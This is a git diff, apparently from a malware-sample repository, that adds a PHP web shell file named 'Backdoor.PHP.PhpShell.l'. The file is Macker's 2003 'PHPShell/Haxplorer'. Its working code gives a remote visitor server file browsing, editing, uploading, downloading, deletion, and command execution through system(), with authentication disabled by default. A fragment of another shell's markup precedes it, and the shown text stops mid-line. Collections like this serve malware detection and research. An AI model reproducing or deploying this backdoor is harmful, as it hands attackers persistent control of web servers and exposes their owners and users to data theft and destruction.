<?php +} + ?> + <table width=100% border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="silver border"> + <center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center> + </td> + </tr> + </table> + </td> + </tr> + </table> + + <?php + } + +?> + + diff --git a/PHP/Backdoor.PHP.PhpShell.l b/PHP/Backdoor.PHP.PhpShell.l new file mode 100644 index 00000000..b372b0bb --- /dev/null +++ b/PHP/Backdoor.PHP.PhpShell.l @@ -0,0 +1,1009 @@ +<?php + +/* +***************************************************************************************** +* PHPSHELL.PHP BY MACKER August 28th 2003 * +***************************************************************************************** +* * +* Welcome to Macker's PHPShell script... * +* This script will allow you to browse webservers etc... * +* Just copy the file to your directory and open it in your Internet Browser. * +* * +* The webserver should support PHP... * +* * +* You can modify the script if you want, but please send me a copy to: * +* DRAZZ01@HOTMAIL.COM * +***************************************************************************************** + +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! +!! PLEASE NOTE: You should use this script at own risk, it should do damage to the !! +!! Sites or even the server... You are responsible for your own deeds. !! +!! The admin of your webserver should always know you are using this !! +!! script. !! +!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! +*/ + + +/*Setting some envirionment variables...*/ + +/* I added this to ensure the script will run correctly... + Please enter the Script's filename in this variable. */ +$SFileName=$PHP_SELF; + +/* uncomment the two following variables if you want to use http + authentication. This will password protect your PHPShell */ +//$http_auth_user = "phpshell"; /* HTTP Authorisation username, uncomment if you want to use this */ +//$http_auth_pass = "phpshell"; /* HTTP Authorisation password, uncomment if you want to use this */ + +error_reporting(0); +$PHPVer=phpversion(); +$isGoodver=(intval($PHPVer[0])>=4); +$scriptTitle = "PHPShell"; +$scriptident = "$scriptTitle by Macker"; + +$urlAdd = ""; +$formAdd = ""; + +function walkArray($array){ + while (list($key, $data) = each($array)) + if (is_array($data)) { walkArray($data); } + else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";} +} + +if (isset($_PUT)) walkArray($_PUT); +if (isset($_GET)) walkArray($_GET); +if (isset($_POST)) walkArray($_POST); + + $pos = strpos($urlAdd, "s=r"); +if (strval($pos) != "") { +$urlAdd= substr($urlAdd, 0, $pos); +} + $urlAdd .= "&s=r&"; + +if (empty($Pmax)) + $Pmax = 125; /* Identifies the max amount of Directories and files listed on one page */ +if (empty($Pidx)) + $Pidx = 0; + +$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); +$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + +$scriptdate = "August 28th 2003"; +$scriptver = "Version 2.6.6dev"; +$LOCAL_IMAGE_DIR = "img"; +$REMOTE_IMAGE_URL = "img"; +$img = array( + "Edit" => "edit.gif", + "Download" => "download.gif", + "Upload" => "upload.gif", + "Delete" => "delete.gif", + "View" => "view.gif", + "Rename" => "rename.gif", + "Move" => "move.gif", + "Copy" => "copy.gif", + "Execute" => "exec.gif" + ); + +while (list($id, $im)=each($img)) + if (file_exists("$LOCAL_IMAGE_DIR/$im")) + $img[$id] = "<img height=\"16\" width=\"16\" border=\"0\" src=\"$REMOTE_IMAGE_URL/$im\" alt=\"$id\">"; + else + $img[$id] = "[$id]"; + + + + +/* HTTP AUTHENTICATION */ + + if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) { + setcookie("noauth",""); + Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\""); + Header( "HTTP/1.0 401 Unauthorized"); + echo "Your username or password is incorrect"; + exit ; + + } + +function buildUrl($display, $url) { + global $urlAdd; + $url = $SFileName . "?$urlAdd$url"; + return "<a href=\"$url\">$display</a>"; +} + +function sp($mp) { + for ( $i = 0; $i < $mp; $i++ ) + $ret .= "&nbsp;"; + return $ret; +} + +function spacetonbsp($instr) { return str_replace(" ", "&nbsp;", $instr); } + +function Mydeldir($Fdir) { + if (is_dir($Fdir)) { + $Fh=@opendir($Fdir); + while ($Fbuf = readdir($Fh)) + if (($Fbuf != ".") && ($Fbuf != "..")) + Mydeldir("$Fdir/$Fbuf"); + @closedir($Fh); + return rmdir($Fdir); + } else { + return unlink($Fdir); + } +} + + +function arrval ($array) { +list($key, $data) = $array; +return $data; +} + +function formatsize($insize) { + $size = $insize; + $add = "B"; + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "KB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "MB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "GB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "TB"; + } + return "$size $add"; +} + +if ($cmd != "downl") { + ?> + +<!-- <?php echo $scriptident ?>, <?php echo $scriptver ?>, <?php echo $scriptdate ?> --> +<HTML> + <HEAD> + <STYLE> + <!-- + A{ text-decoration:none; color:navy; font-size: 12px } + body { font-size: 12px; + font-family: arial, helvetica; + scrollbar-width: 5; + scrollbar-height: 5; + scrollbar-face-color: white; + scrollbar-shadow-color: silver; + scrollbar-highlight-color: white; + scrollbar-3dlight-color:silver; + scrollbar-darkshadow-color: silver; + scrollbar-track-color: white; + scrollbar-arrow-color: black; + } + Table { font-size: 12px; } + TR{ font-size: 12px; } + TD{ font-size: 12px; + font-family: arial, helvetical; + BORDER-LEFT: black 0px solid; + BORDER-RIGHT: black 0px solid; + BORDER-TOP: black 0px solid; + BORDER-BOTTOM: black 0px solid; + COLOR: black; + } + .border{ BORDER-LEFT: black 1px solid; + BORDER-RIGHT: black 1px solid; + BORDER-TOP: black 1px solid; + BORDER-BOTTOM: black 1px solid; + } + .none { BORDER-LEFT: black 0px solid; + BORDER-RIGHT: black 0px solid; + BORDER-TOP: black 0px solid; + BORDER-BOTTOM: black 0px solid; + } + .inputtext { + background-color: #EFEFEF; + font-family: arial, helvetica; + border: 1px solid #000000; + height: 20; + } + .lighttd { background: #F8F8F8; + } + .darktd { background: #E8E8E8; + } + input { font-family: arial, helvetica; + } + .inputbutton { + background-color: silver; + border: 1px solid #000000; + border-width: 1px; + height: 20; + } + .inputtextarea { + background-color: #EFEFEF; + border: 1px solid #000000; + scrollbar-width: 5; + scrollbar-height: 5; + scrollbar-face-color: #EFEFEF; + scrollbar-shadow-color: silver; + scrollbar-highlight-color: #EFEFEF; + scrollbar-3dlight-color:silver; + scrollbar-darkshadow-color: silver; + scrollbar-track-color: #EFEFEF; + scrollbar-arrow-color: black; + } + .top { BORDER-TOP: black 1px solid; } + .textin { BORDER-LEFT: silver 1px solid; + BORDER-RIGHT: silver 1px solid; + BORDER-TOP: silver 1px solid; + BORDER-BOTTOM: silver 1px solid; + width: 99%; font-size: 12px; font-weight: bold; color: navy; + } + .notop { BORDER-TOP: black 0px solid; } + .bottom { BORDER-BOTTOM: black 1px solid; } + .nobottom { BORDER-BOTTOM: black 0px solid; } + .left { BORDER-LEFT: black 1px solid; } + .noleft { BORDER-LEFT: black 0px solid; } + .right { BORDER-RIGHT: black 1px solid; } + .noright { BORDER-RIGHT: black 0px solid; } + .silver{ BACKGROUND: silver; } + --> + </STYLE> + <TITLE><?php echo $SFileName ?></TITLE> + </HEAD> + <body topmargin="0" leftmargin="0"> + <div style="position: absolute; background: white; z-order:10000; top:0; left:0; width: 100%; height: 100%;"> + <table width=100% height="100%" NOWRAP border="0"> + <tr NOWRAP> + <td width="100%" NOWRAP> + <table NOWRAP width=100% border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="silver border"> + <center> + <strong> + <font size=3><?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?></font> + </strong> + </center> + </td> + </tr> + </table><br> + + <?php +} + +if ( $cmd=="dir" ) { + $h=@opendir($dir); + if ($h == false) { + echo "<br><font color=\"red\">".sp(3)."\n\n\n\n + COULD NOT OPEN THIS DIRECTORY!!!<br>".sp(3)."\n + THE SCRIPT WILL RESULT IN AN ERROR!!! + <br><br>".sp(3)."\n + PLEASE MAKE SURE YOU'VE GOT READ PERMISSIONS TO THE DIR... + <br><br></font>\n\n\n\n"; + } + if (function_exists('realpath')) { + $partdir = realpath($dir); + } + else { + $partdir = $dir; + } + if (strlen($partdir) >= 100) { + $partdir = substr($partdir, -100); + $pos = strpos($partdir, "/"); + if (strval($pos) != "") { + $partdir = "<-- ...".substr($partdir, $pos); + } + $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir ))); + $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); + $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + } + ?> + <form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir"> + <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td width="100%" class="silver border"> + <center>&nbsp;HAXPLORER - Server Files Browser...&nbsp;</center> + </td> + </tr> + </table> + <br> + <table width="100%" border="0" cellpadding="0" cellspacing="0"> + <tr> + <td class="border nobottom noright"> + &nbsp;Browsing:&nbsp; + </td> + <td width="100%" class="border nobottom noleft"> + <table width="100%" border="0" cellpadding="1" cellspacing="0"> + <tr> + <td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td> + <td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GO<b></a>&nbsp;<center></td> + </tr> + </table> + + </td> + </tr> + </table> + <!-- </form> --> + <table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" > + <tr> + <td width="100%" NOWRAP class="silver border"> + &nbsp;Filename&nbsp; + </td> + <td NOWRAP class="silver border noleft"> + &nbsp;Actions&nbsp;(Attempt to perform)&nbsp; + </td> + <td NOWRAP class="silver border noleft"> + &nbsp;Size&nbsp; + </td> + <td width=1 NOWRAP class="silver border noleft"> + &nbsp;Attributes&nbsp; + </td> + <td NOWRAP class="silver border noleft"> + &nbsp;Modification Date&nbsp; + </td> + <tr> + <?php + + + /* <!-- This whole heap of junk is the sorting section... */ + + $dirn = array(); + $filen = array(); + $filesizes = 0; + while ($buf = readdir($h)) { + if (is_dir("$dir/$buf")) + $dirn[] = $buf; + else + $filen[] = $buf; + } + $dirno = count($dirn) + 1; + $fileno = count($filen) + 1; + + function mycmp($a, $b){ + if ($a == $b) return 0; + return (strtolower($a) < strtolower($b)) ? -1 : 1; + } + + if (function_exists("usort")) { + usort($dirn, "mycmp"); + usort($filen, "mycmp"); + } + else { + sort ($dirn); + sort ($filen); + } + reset ($dirn); + reset ($filen); + if (function_exists('array_merge')) { + $filelist = array_merge ($dirn, $filen); + } + else { + $filelist = $dirn + $filen; + } + + + if ( count($filelist)-1 > $Pmax ) { + $from = $Pidx * $Pmax; + $to = ($Pidx + 1) * $Pmax-1; + if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 ) + $to = count($filelist) - 1; + if ($to > count($filelist)-1) + $to = count($filelist)-1; + $Dcontents = array(); + For ($Fi = $from; $Fi <= $to; $Fi++) { + $Dcontents[] = $filelist[$Fi]; + } + + } + else { + $Dcontents = $filelist; + } + + $tdcolors = array("lighttd", "darktd"); + + while (list ($key, $file) = each ($Dcontents)) { + if (!$tdcolor=arrval(each($tdcolors))) { + reset($tdcolors); + $tdcolor = arrval(each($tdcolors)); } + + if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */ + /* <!-- Dirname --> */ + echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n"; + /* <!-- Actions --> */ + echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n"; + /* <!-- Rename --> */ + if ( ($file != ".") && ($file != "..") ) + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + /* <!-- Delete --> */ + if ( ($file != ".") && ($file != "..") ) + echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + /* <!-- End of Actions --> */ + echo "&nbsp;&nbsp;</center></td>\n"; + /* <!-- Size --> */ + echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n"; + /* <!-- Attributes --> */ + echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n"; + echo "<strong>D</strong>"; + if ( @is_readable("$dir/$file") ) { + echo "<strong>R</strong>"; + } + if (function_exists('is_writeable')) { + if ( @is_writeable("$dir/$file") ) { + echo "<strong>W</stong>"; + } + } + else { + echo "<strong>(W)</stong>"; + } + if ( @is_executable("$dir/$file") ) { + echo "<Strong>X<strong>"; + } + echo "&nbsp;&nbsp;</td>\n"; + /* <!-- Date --> */ + echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n"; + echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;"; + echo "</td>"; + echo "</tr>\n"; + + } + else { /* <!-- Then it must be a File... --> */ + /* <!-- Filename --> */ + if ( @is_readable("$dir/$file") ) + echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n"; + else + echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n"; + /* <!-- Actions --> */ + echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n"; + /* <!-- Rename --> */ + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + /* <!-- Edit --> */ + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n"; + /* <!-- Copy --> */ + echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n"; + /* <!-- Move --> */ + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n"; + /* <!-- Delete --> */ + echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + /* <!-- Download --> */ + echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n"; + /* <!-- Execute --> */ + if ( @is_executable("$dir/$file") ) + echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n"; + /* <!-- End of Actions --> */ + echo sp(2)."</center></td>\n"; + /* <!-- Size --> */ + echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n"; + $size = @filesize("$dir/$file"); + If ($size != false) { + $filesizes += $size; + echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>"; + } + else + echo "&nbsp;&nbsp;<strong>0 B<strong>"; + echo "&nbsp;&nbsp;</td>\n"; + + /* <!-- Attributes --> */ + echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n"; + + if ( @is_readable("$dir/$file") ) + echo "<strong>R</strong>"; + if ( @is_writeable("$dir/$file") ) + echo "<strong>W</stong>"; + if ( @is_executable("$dir/$file") ) + echo "<Strong>X<strong>"; + if (function_exists('is_uploaded_file')){ + if ( @is_uploaded_file("$dir/$file") ) + echo "<Strong>U<strong>"; + } + else { + echo "<Strong>(U)<strong>"; + } + echo "&nbsp;&nbsp;</td>\n"; + /* <!-- Date --> */ + echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n"; + echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;"; + echo "</td>"; + echo "</tr>\n"; + } + } + + echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n"; + echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Dir(s),&nbsp;".@count ($filen)."&nbsp;File(s)&nbsp;&nbsp;\n"; + echo "</td><td NOWRAP class=\"silver border noleft\">\n"; + echo "&nbsp;&nbsp;Total filesize:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n"; + + function printpagelink($a, $b, $link = ""){ + if ($link != "") + echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>"; + else + echo "<b>| $a - $b |</b>"; + } + + if ( count($filelist)-1 > $Pmax ) { + echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>"; + $Fi = 0; + while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) { + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = ($Fi + 1) * $Pmax - 1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + echo "&nbsp;&nbsp;&nbsp;"; + $Fi++; + } + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = count($filelist)-1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + + + echo "</center></td></tr></table></td></tr>"; + } + + + echo "</table>\n<br><table NOWRAP>"; + + if ($isGoodver) { + echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n"; + } + else { + echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n"; + } + /* <!-- Other Actions --> */ + echo "<tr><td class=\"silver border\">&nbsp;<strong>Other actions:&nbsp;&nbsp;</strong>&nbsp;</td>\n"; + echo "<td>&nbsp;<b>".buildUrl( "| New File |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| New Directory |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| Upload a File |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n"; + echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n"; + echo "<tr><td class=\"silver border\">&nbsp;<strong>Your IP:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n"; + echo "<tr><td class=\"silver border\">&nbsp;<strong>Browsing Directory:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n"; + echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Legend:&nbsp;&nbsp;</strong&nbsp;</td><td>\n"; + echo "<table NOWRAP>"; + echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Directory.</td></tr>\n"; + echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Readable.</td></tr>\n"; + echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Writeable.</td></tr>\n"; + echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Executable.</td></tr>\n"; + echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n"; + echo "</table></td>"; + echo "</table>"; + echo "<br>"; + @closedir($h); + } + elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/ + echo system("$file"); + } +elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */ + echo "<center><table><tr><td NOWRAP>" ; + if ($auth == "yes") { + if (Mydeldir($file)==false) { + echo "Could not remove \"$file\"<br>Permission denied, or directory not empty..."; + } + else { + echo "Successfully removed \"$file\"<br>"; + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>"; + } + else { + echo "Are you sure you want to delete \"$file\" and all it's subdirectories ? + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"deldir\"> + <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\"> + <input type=\"hidden\" name=\"file\" value=\"$file\"> + <input type=\"hidden\" name=\"auth\" value=\"yes\"> + <input type=\"submit\" value=\"Yes\"></form> + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>"; + } + echo "</td></tr></center>"; +} + elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ; + if ($auth == "yes") { + if (@unlink($file)==false) { + echo "Could not remove \"$file\"<br>"; + } + else { + echo "Successfully removed \"$file\"<br>"; + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form>"; + } + else { + echo "Are you sure you want to delete \"$file\" ? + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"delfile\"> + <input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\"> + <input type=\"hidden\" name=\"file\" value=\"$file\"> + <input type=\"hidden\" name=\"auth\" value=\"yes\"> + + <input type=\"submit\" value=\"Yes\"></form> + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>"; + } + echo "</td></tr></center>"; +} +elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */ + echo "<center><table><tr><td NOWRAP>"; + $i = 1; + while (file_exists("$lastdir/newfile$i.txt")) + $i++; + $file = fopen("$lastdir/newfile$i.txt", "w+"); + if ($file == false) + echo "Could not create the new file...<br>"; + else + echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>"; + echo " + <form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"> + </form></center> + </td></tr></table></center> "; + } +elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */ + echo "<center><table><tr><td NOWRAP>" ; + $i = 1; + while (is_dir("$lastdir/newdir$i")) + $i++; + $file = mkdir("$lastdir/newdir$i", 0777); + if ($file == false) + echo "Could not create the new directory...<br>"; + else + echo "Successfully created: \"$lastdir/newdir$i\"<br>"; + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"> + <input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"> + <input type=\"hidden\" name=\"dir\" value=\"$lastdir\"> + <input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"> + </form></center></td></tr></table></center>"; +} +elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */ + $contents = ""; + $fc = @file( $file ); + while ( @list( $ln, $line ) = each( $fc ) ) { + $contents .= htmlentities( $line ) ; + } + echo "<br><center><table><tr><td NOWRAP>"; + echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n"; + echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n"; + echo "<strong>EDIT FILE: </strong>$file<br>\n"; + echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n"; + echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n"; + echo "<input type=\"submit\" value=\"Save\">"; + echo "</form>"; + echo "</td></tr></table></center>"; +} +elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */ + $fo = fopen($file, "w"); + $wrret = fwrite($fo, stripslashes($contents)); + $clret = fclose($fo); +} +elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */ + $downloadfile = urldecode($file); + if (function_exists("basename")) + $downloadto = basename ($downloadfile); + else + $downloadto = "download.ext"; + if (!file_exists("$downloadfile")) + echo "The file does not exist"; + else { + $size = @filesize("$downloadfile"); + if ($size != false) { + $add="; size=$size"; + } + else { + $add=""; + } + header("Content-Type: application/download"); + header("Content-Disposition: attachment; filename=$downloadto$add"); + $fp=fopen("$downloadfile" ,"rb"); + fpassthru($fp); + flush(); + } +} +elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */ + ?> + <center> + <table> + <tr> + <td NOWRAP> + Welcome to the upload section... + Please note that the destination file will be + <br> overwritten if it already exists!!!<br><br> + <form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post"> + <input type="hidden" name="MAX_FILE_SIZE" value="1099511627776"> + <input type="hidden" name="cmd" value="uploadproc"> + <input type="hidden" name="dir" value="<?php echo $dir ?>"> + <input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>"> + <input type="hidden" name="lastdir" value="<?php echo $lastdir ?>"> + Select local file:<br> + <input size="75" name="userfile" type="file"><br> + <input type="submit" value="Send File"> + </form> + <br> + <form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST"> + <input type="hidden" name="cmd" value="<?php echo $lastcmd ?>"> + <input type="hidden" name="dir" value="<?php echo $lastdir ?>"> + <input tabindex="0" type="submit" value="Cancel"> + </form> + </td> + </tr> + </table> + </center> + + <?php +} +elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */ + echo "<center><table><tr><td NOWRAP>"; + if (file_exists($userfile)) + $res = copy($userfile, "$dir/$userfile_name"); + echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n"; + if ($res) { + echo "Successfully moved \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>"; + echo "Local filename: \"$userfile_name\".\n<br>Remote filename: \"$userfile\".\n<br>"; + echo "Filesize: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>"; + } + else { + echo "Could not move uploaded file; Action aborted..."; + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ; + echo "<br><br></td></tr></table></center>"; +} +elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */ + echo "<hr>"; + $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { + echo spacetonbsp(@htmlentities($line))."<br>\n"; + } + echo "<hr>"; +} +elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */ + if (function_exists('is_dir')) { + if (is_dir("$oldfile")) { + $objname = "Directory"; + $objident = "Directory"; + } + else { + $objname = "Filename"; + $objident = "file"; + } + } + echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n"; + If (empty($newfile) != true) { + echo "<center>"; + $return = @rename($oldfile, "$olddir$newfile"); + if ($return) { + echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\""; + } + else { + if ( @file_exists("$olddir$newfile") ) { + echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again..."; + } + else { + echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it."; + } + } + echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Back to Haxplorer\"></form></center>" ; + } + else { + $dpos = strrpos($oldfile, "/"); + if (strval($dpos)!="") { + $olddir = substr($oldfile, 0, $dpos+1); + } + else { + $olddir = "$lastdir/"; + } + $fpos = strrpos($oldfile, "/"); + if (strval($fpos)!="") { + $inputfile = substr($oldfile, $fpos+1); + } + else { + $inputfile = ""; + } + echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n"; + echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n"; + echo "<input type=\"hidden\" 